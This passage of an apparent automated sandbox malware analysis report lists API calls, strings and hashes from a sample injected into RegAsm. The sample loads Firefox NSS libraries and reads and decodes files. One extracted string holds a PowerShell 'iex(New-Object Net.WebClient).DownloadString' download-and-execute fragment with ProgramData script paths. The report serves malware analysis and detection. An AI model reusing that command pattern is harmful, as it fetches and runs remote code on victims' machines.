                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6C91EE65
                                                                                • PR_Unlock.NSS3(?), ref: 6C91EEA2
                                                                                • free.MOZGLUE(?), ref: 6C91EEBB
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6C91EED0
                                                                                • PR_Unlock.NSS3(?), ref: 6C91EF48
                                                                                • free.MOZGLUE(?), ref: 6C91EF68
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6C91EF7D
                                                                                • PK11_DoesMechanism.NSS3(?,?), ref: 6C91EFA4
                                                                                • free.MOZGLUE(?), ref: 6C91EFDA
                                                                                • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C91F055
                                                                                • free.MOZGLUE(?), ref: 6C91F060
                                                                                Similarity
                                                                                • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                • String ID:
                                                                                • API String ID: 2524771861-0
                                                                                • Opcode ID: 659fe4bf99b0f3c6262d0c23db746bfcec0135b3faef7b17299b35e944e3c20b
                                                                                • Instruction ID: 8eb6d2729ba9329d2cbea276553d44a7fc724c2a817294360c686d2c828a0209
                                                                                • Opcode Fuzzy Hash: 659fe4bf99b0f3c6262d0c23db746bfcec0135b3faef7b17299b35e944e3c20b
                                                                                • Instruction Fuzzy Hash: 9A817271A04209ABEF01DF65DD46AEE7BB9BF19318F144024ED09A3F11E735E924CBA1
                                                                                APIs
                                                                                • PK11_SignatureLen.NSS3(?), ref: 6C8E4D80
                                                                                • PORT_Alloc_Util.NSS3(00000000), ref: 6C8E4D95
                                                                                • PORT_NewArena_Util.NSS3(00000800), ref: 6C8E4DF2
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8E4E2C
                                                                                • PR_SetError.NSS3(FFFFE028,00000000), ref: 6C8E4E43
                                                                                • PORT_NewArena_Util.NSS3(00000800), ref: 6C8E4E58
                                                                                • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C8E4E85
                                                                                • DER_Encode_Util.NSS3(?,?,6CA305A4,00000000), ref: 6C8E4EA7
                                                                                • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C8E4F17
                                                                                • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C8E4F45
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C8E4F62
                                                                                • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C8E4F7A
                                                                                • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C8E4F89
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C8E4FC8
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                • String ID:
                                                                                • API String ID: 2843999940-0
                                                                                • Opcode ID: eaa8e0ec0a4ca8b9a037ec59290703ee93687f0205e9093fd0ea4ebf6630a93b
                                                                                • Instruction ID: 1609d1709e8fff3c66fa64e2b336fa43e8a4bc8c8fb3ce6050ee5b288e9de146
                                                                                • Opcode Fuzzy Hash: eaa8e0ec0a4ca8b9a037ec59290703ee93687f0205e9093fd0ea4ebf6630a93b
                                                                                • Instruction Fuzzy Hash: 0A81A071908301AFE721CFA8D940B5AB7E4ABDA718F14892DF95CDB641E731E904CB92
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 6C80D4F0
                                                                                • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C80D4FC
                                                                                • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C80D52A
                                                                                • GetCurrentThreadId.KERNEL32 ref: 6C80D530
                                                                                • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C80D53F
                                                                                • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C80D55F
                                                                                • free.MOZGLUE(00000000), ref: 6C80D585
                                                                                • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C80D5D3
                                                                                • GetCurrentThreadId.KERNEL32 ref: 6C80D5F9
                                                                                • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C80D605
                                                                                • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C80D652
                                                                                • GetCurrentThreadId.KERNEL32 ref: 6C80D658
                                                                                • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C80D667
                                                                                • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C80D6A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                • String ID:
                                                                                • API String ID: 2206442479-0
                                                                                • Opcode ID: dd7e96cb66919a424d3b06ccea0dbe15eb5a2379863544cc658cde001f7d22c9
                                                                                • Instruction ID: 30e6b8d21a72f0e3c66f88869608ecc3db833693ac561c953c238f461f91836f
                                                                                • Opcode Fuzzy Hash: dd7e96cb66919a424d3b06ccea0dbe15eb5a2379863544cc658cde001f7d22c9
                                                                                • Instruction Fuzzy Hash: B15180B1604705DFC724DF74C888A9ABBF4FF89318F109A2EE85A87751DB30A845CB91
                                                                                APIs
                                                                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C91781D,00000000,6C90BE2C,?,6C916B1D,?,?,?,?,00000000,00000000,6C91781D), ref: 6C916C40
                                                                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C91781D,?,6C90BE2C,?), ref: 6C916C58
                                                                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C91781D), ref: 6C916C6F
                                                                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C916C84
                                                                                • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C916C96
                                                                                  • Part of subcall function 6C8C1240: TlsGetValue.KERNEL32(00000040,?,6C8C116C,NSPR_LOG_MODULES), ref: 6C8C1267
                                                                                  • Part of subcall function 6C8C1240: EnterCriticalSection.KERNEL32(?,?,?,6C8C116C,NSPR_LOG_MODULES), ref: 6C8C127C
                                                                                  • Part of subcall function 6C8C1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C8C116C,NSPR_LOG_MODULES), ref: 6C8C1291
                                                                                  • Part of subcall function 6C8C1240: PR_Unlock.NSS3(?,?,?,?,6C8C116C,NSPR_LOG_MODULES), ref: 6C8C12A0
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C916CAA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                • API String ID: 4221828374-3736768024
                                                                                • Opcode ID: 6c1726b83bdc708ce52b3cfecbdd56e41be7c89a3d229a01b80358896828aed0
                                                                                • Instruction ID: c3f276e4419dee7875a9dcf591c8f2d4c02e8e122e6b6e86a255e005f75e5ac4
                                                                                • Opcode Fuzzy Hash: 6c1726b83bdc708ce52b3cfecbdd56e41be7c89a3d229a01b80358896828aed0
                                                                                • Instruction Fuzzy Hash: 7A0184B2B0A3162BF71027795D4AF26255DFF8119CF184431FF04E0D42EA96E51580B6
                                                                                APIs
                                                                                • PR_SetErrorText.NSS3(00000000,00000000,?,6C8E78F8), ref: 6C924E6D
                                                                                  • Part of subcall function 6C8C09E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C8C06A2,00000000,?), ref: 6C8C09F8
                                                                                  • Part of subcall function 6C8C09E0: malloc.MOZGLUE(0000001F), ref: 6C8C0A18
                                                                                  • Part of subcall function 6C8C09E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C8C0A33
                                                                                • PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C8E78F8), ref: 6C924ED9
                                                                                  • Part of subcall function 6C915920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C917703,?,00000000,00000000), ref: 6C915942
                                                                                  • Part of subcall function 6C915920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C917703), ref: 6C915954
                                                                                  • Part of subcall function 6C915920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C91596A
                                                                                  • Part of subcall function 6C915920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C915984
                                                                                  • Part of subcall function 6C915920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C915999
                                                                                  • Part of subcall function 6C915920: free.MOZGLUE(00000000), ref: 6C9159BA
                                                                                  • Part of subcall function 6C915920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C9159D3
                                                                                  • Part of subcall function 6C915920: free.MOZGLUE(00000000), ref: 6C9159F5
                                                                                  • Part of subcall function 6C915920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C915A0A
                                                                                  • Part of subcall function 6C915920: free.MOZGLUE(00000000), ref: 6C915A2E
                                                                                  • Part of subcall function 6C915920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C915A43
                                                                                • SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C8E78F8), ref: 6C924EB3
                                                                                  • Part of subcall function 6C924820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C924EB8,?,?,?,?,?,?,?,?,?,?,6C8E78F8), ref: 6C92484C
                                                                                  • Part of subcall function 6C924820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C924EB8,?,?,?,?,?,?,?,?,?,?,6C8E78F8), ref: 6C92486D
                                                                                  • Part of subcall function 6C924820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C924EB8,?), ref: 6C924884
                                                                                • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C8E78F8), ref: 6C924EC0
                                                                                  • Part of subcall function 6C924470: TlsGetValue.KERNEL32(00000000,?,6C8E7296,00000000), ref: 6C924487
                                                                                  • Part of subcall function 6C924470: EnterCriticalSection.KERNEL32(?,?,?,6C8E7296,00000000), ref: 6C9244A0
                                                                                  • Part of subcall function 6C924470: PR_Unlock.NSS3(?,?,?,?,6C8E7296,00000000), ref: 6C9244BB
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C8E78F8), ref: 6C924F16
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C8E78F8), ref: 6C924F2E
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C8E78F8), ref: 6C924F40
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C8E78F8), ref: 6C924F6C
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C8E78F8), ref: 6C924F80
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C8E78F8), ref: 6C924F8F
                                                                                • PK11_UpdateSlotAttribute.NSS3(?,6C9FDCB0,00000000), ref: 6C924FFE
                                                                                • PK11_UserDisableSlot.NSS3(0000001E), ref: 6C92501F
                                                                                • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C8E78F8), ref: 6C92506B
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
                                                                                • String ID:
                                                                                • API String ID: 560490210-0
                                                                                • Opcode ID: fffd285744d92dae2bc43255016edeb98e63a05115595d1e5c3d02b0467073fb
                                                                                • Instruction ID: 2a70ec1003e55135127c92094c9d5bba573cf515a68b80252ef7904da58a4225
                                                                                • Opcode Fuzzy Hash: fffd285744d92dae2bc43255016edeb98e63a05115595d1e5c3d02b0467073fb
                                                                                • Instruction Fuzzy Hash: 845138B1D102029BEB219F24EC01AAA77B4FF2531CF044635EC8A82B1AF735D565CBD2
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00412DDC
                                                                                • memset.MSVCRT ref: 00412DFD
                                                                                • memset.MSVCRT ref: 00412E0B
                                                                                  • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00412E37
                                                                                • lstrcat.KERNEL32(?), ref: 00412E55
                                                                                • lstrcat.KERNEL32(?,?), ref: 00412E69
                                                                                • lstrcat.KERNEL32(?), ref: 00412E7C
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                  • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425C4E,?,?), ref: 00410CF6
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 0040C186: _EH_prolog.MSVCRT ref: 0040C18B
                                                                                  • Part of subcall function 0040C186: StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040C1DE
                                                                                  • Part of subcall function 0040C186: memcmp.MSVCRT ref: 0040C21C
                                                                                  • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                  • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                  • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                  • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                  • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                  • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                  • Part of subcall function 00410F98: GlobalAlloc.KERNEL32(00000000,/A,00000000,00000000,?,00412F0A,?,?), ref: 00410FA3
                                                                                • StrStrA.SHLWAPI(00000000), ref: 00412F16
                                                                                • GlobalFree.KERNEL32(?), ref: 00412FE5
                                                                                  • Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406262
                                                                                  • Part of subcall function 00406242: LocalAlloc.KERNEL32(00000040,004058F9,?,?,004058F9,00000000,?,?), ref: 00406270
                                                                                  • Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406286
                                                                                  • Part of subcall function 00406242: LocalFree.KERNEL32(00000000,?,?,004058F9,00000000,?,?), ref: 00406295
                                                                                  • Part of subcall function 004063B1: _EH_prolog.MSVCRT ref: 004063B6
                                                                                  • Part of subcall function 004063B1: memcmp.MSVCRT ref: 004063DC
                                                                                  • Part of subcall function 004063B1: memset.MSVCRT ref: 0040640B
                                                                                  • Part of subcall function 004063B1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00412F8B
                                                                                • StrCmpCA.SHLWAPI(?,00426576,?,?,?,?,000003E8), ref: 00412FA8
                                                                                • lstrcat.KERNEL32(?,?), ref: 00412FC1
                                                                                • lstrcat.KERNEL32(?,004268E0), ref: 00412FCF
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$H_prolog$AllocFileLocal$memset$BinaryCryptFreeGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                • String ID:
                                                                                • API String ID: 174962345-0
                                                                                • Opcode ID: 54fda64b2706fe2e4b1d59de1c4ade093412862ff686ac036716463b3a26dbdf
                                                                                • Instruction ID: 16ae336f9ee2c04b565ca64b3f8ee01633a3d4ddb81cadfbdee95fe62696da0d
                                                                                • Opcode Fuzzy Hash: 54fda64b2706fe2e4b1d59de1c4ade093412862ff686ac036716463b3a26dbdf
                                                                                • Instruction Fuzzy Hash: BD613F72D0021DABDF11EBE1DC45DDEBBBDAF18304F00046AF505E3151EA7996988B65
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                • String ID:
                                                                                • API String ID: 786543732-0
                                                                                • Opcode ID: 483e57131535fdadae28dd77c858abae5a422696724e6e3437a896e050ac5ca4
                                                                                • Instruction ID: a88c845163d533e6575945f674fb7512c1aaa5a8ce2b89d88f7e2ab9d47f159f
                                                                                • Opcode Fuzzy Hash: 483e57131535fdadae28dd77c858abae5a422696724e6e3437a896e050ac5ca4
                                                                                • Instruction Fuzzy Hash: E35193B1F0121A8BDB24DF98DE456FE7774AB16349F148925DA09A3B00D335E906CBD2
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00412830
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                  • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 00412BFF
                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                • String ID: "" $')"$*.ps1$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$<$C:\ProgramData\$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                • API String ID: 585178538-2722297100
                                                                                • Opcode ID: 9483e41db0ac2eb040231f30dcecdcea48590b6e4d5846af3410028562ffded0
                                                                                • Instruction ID: 4a9e700a9cdb5e2616cf4f83db54e7418e724996024359a16896e76ceccca2dd
                                                                                • Opcode Fuzzy Hash: 9483e41db0ac2eb040231f30dcecdcea48590b6e4d5846af3410028562ffded0
                                                                                • Instruction Fuzzy Hash: D2D15CB090424DEADB15EBE5C952BDEBBB8AF18308F5040BEE505735C2DA781B4CCB65
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C90ADE6
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C90AE17
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C90AE29
                                                                                  • Part of subcall function 6C9ED930: PL_strncpyz.NSS3(?,?,?), ref: 6C9ED963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6C90AE3F
                                                                                • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C90AE78
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C90AE8A
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6C90AEA0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: L_strncpyzPrint$L_strcatn
                                                                                • String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
                                                                                • API String ID: 332880674-605059067
                                                                                • Opcode ID: b4c0ef0589e0cb060d01464a679b2c586657b97061275e9870e023b51421ebfe
                                                                                • Instruction ID: 9be6242c0d85d58895b9e7fe02cb5ae7c4b06aacad5f5bef8ecb2f4f7f6a7933
                                                                                • Opcode Fuzzy Hash: b4c0ef0589e0cb060d01464a679b2c586657b97061275e9870e023b51421ebfe
                                                                                • Instruction Fuzzy Hash: 74311532700205ABCB159F54DC88BAE7775AFA631CF048428E40D9BB02DF34D84ACBD2
                                                                                APIs
                                                                                • sqlite3_value_text16.NSS3(?), ref: 6C9A4CAF
                                                                                • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C9A4CFD
                                                                                • sqlite3_value_text16.NSS3(?), ref: 6C9A4D44
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_value_text16$sqlite3_log
                                                                                • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                • API String ID: 2274617401-4033235608
                                                                                • Opcode ID: a690594916162166b7f3f0459c25783ef883d4043fb18080adca915352dc1141
                                                                                • Instruction ID: 3445fe02143fd77d93a82835ef5a55f1a793d581ce65e3e0a05e400856ac2eee
                                                                                • Opcode Fuzzy Hash: a690594916162166b7f3f0459c25783ef883d4043fb18080adca915352dc1141
                                                                                • Instruction Fuzzy Hash: 253154B3B48911B7D71846A8A8017E4B33A7B82318F156539D4294BE14CF25FC538FE2
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_DigestUpdate), ref: 6C906F16
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C906F44
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C906F53
                                                                                  • Part of subcall function 6C9ED930: PL_strncpyz.NSS3(?,?,?), ref: 6C9ED963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6C906F69
                                                                                • PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C906F88
                                                                                • PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C906FA1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Print$L_strncpyz$L_strcatn
                                                                                • String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate
                                                                                • API String ID: 1003633598-226530419
                                                                                • Opcode ID: 4bea20277367af5357eeff3347b5b80bb495bc7d67b1602257947306fc261671
                                                                                • Instruction ID: fdefff977dbccfa09fffcdf998e5c02305660297a88c63295d5fe1b4ef29c0ad
                                                                                • Opcode Fuzzy Hash: 4bea20277367af5357eeff3347b5b80bb495bc7d67b1602257947306fc261671
